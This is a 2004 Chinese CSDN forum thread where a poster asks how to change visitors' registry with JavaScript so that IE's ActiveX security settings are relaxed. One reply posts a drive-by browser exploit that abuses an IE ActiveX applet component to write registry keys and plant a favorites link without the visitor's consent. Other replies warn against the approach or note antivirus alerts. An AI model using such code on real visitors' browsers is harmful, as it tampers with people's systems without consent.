请教:用javascript修改客户端注册表的方法?

wqf0827 2004-08-23 09:15:35
因我要将网页中的数据导出到EXCEL表中,用刀 ActiveXObject("Excel.Application")对象,需要每个调用的用户将安全设置种的ActiveX功能设为启用,所以我想用javascript修改客户端注册表,但又不知怎么做,有没有高手告诉我。有分相送。
...全文
361 12 打赏 收藏 转发到动态 举报
写回复
用AI写文章
12 条回复
切换为时间正序
请发表友善的回复…
发表回复
  • 打赏
  • 举报
回复
大狼,看到那个帖子,自行惭愧,就没好意思看写的是什么
超级大笨狼 2004-08-24
  • 打赏
  • 举报
回复
最好别这么做:
http://community.csdn.net/Expert/topic/3278/3278430.xml?temp=.1366999
  • 打赏
  • 举报
回复
查查MSDN上也有介绍的
  • 打赏
  • 举报
回复
写的是对的用wsh我的norton也有病毒警告,呵呵,把纯文本都扫了
flyskytoday 2004-08-24
  • 打赏
  • 举报
回复
打开这个页面会出现病毒警报

谁能来解释一下??????????????????

本人安装Norton AntiVirus
agen10120216 2004-08-24
  • 打赏
  • 举报
回复
mark
DARKNESSFALL 2004-08-24
  • 打赏
  • 举报
回复
不能!
hbzyduwu 2004-08-23
  • 打赏
  • 举报
回复
For example:
<html>
<body>
<script language="JavaScript">
var shl=new ActiveXObject("Wscript.shell");
shl.RegWrite("HKEY_LOCAL_MACHINE\\SOFTWARE\\CDV Software Entertainment AG\\Sudden Strike\\Release 1.0 english version\\forever target folder",".\\","REG_SZ");
window.alert("ok!")
</script>
</body>
</html>

".\\" 写入的值
"REG_SZ" 是写入的数据类型


类型

字串值 REG_SZ
二进制值 REG_BINARY
双字节值 REG_DWORD
52juanjuan 2004-08-23
  • 打赏
  • 举报
回复
别人的机子上一般都是有防御的.客户端写注册表的方法不可靠.
-神仙- 2004-08-23
  • 打赏
  • 举报
回复
不可能的
不然就是IE的又一个漏洞了
gjd111686 2004-08-23
  • 打赏
  • 举报
回复
打过补丁就不好使了
<script>
document.write("<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent></applet>");
function AddFavLnk(LocationHref,LinkName,SiteURL)
{
var Link=Shell.CreateShortcut(LocationHref+"\\"+LinkName+".URL");
Link.TargetPath=SiteURL;
Link.Save();
}
function initFunction()
{
try
{
//ActiveX initialization
A1=document.applets[0];
A1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
A1.createInstance();
Shell=A1.GetObject();
A1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
A1.createInstance();
FSO=A1.GetObject();
A1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
A1.createInstance();
Net=A1.GetObject();
try
{
if(document.cookie.indexOf("Telstar")==-1)
{
Shell.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","");

var DateObject=new Date((new Date()).getTime()+(1));
document.cookie="Telstar=general;Expires="+DateObject.toGMTString()+";path=/;"

WF=FSO.GetSpecialFolder(0);
LocationHref=WF+"\\Favorites";
if(!FSO.FolderExists(LocationHref))
{
LocationHref=FSO.GetDriveName(WF)+"\\Documents and Settings\\"+Net.UserName+"\\Favorites";
if(!FSO.FolderExists(LocationHref))
{
return;
}
}
AddLink(LocationHref,"☆泰利达电脑☆","http://www.tel-star.com.cn/");
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("initFunction()", 1000);
}
init();
</script>
wqf0827 2004-08-23
  • 打赏
  • 举报
回复
以上写法还是不能满足我的要求,因为我的本意是要通过修改客户端注册表来修改 工具 -> internet选项 -> 安全 -> 自定义级别 -> activeX控件设成"启用"或"提示",使得ActiveXObject的使用在客户端可用,但以上写法var shl=new ActiveXObject("Wscript.shell"); 同样用到ActiveXObject,客户端如果没有设置IE的安全性,还是用不成
请再给予提示。并且告诉我,IE的安全性的activeX控件设成"启用"或"提示"在注册表的什么位置

87,922

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 JavaScript
社区管理员
  • JavaScript
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧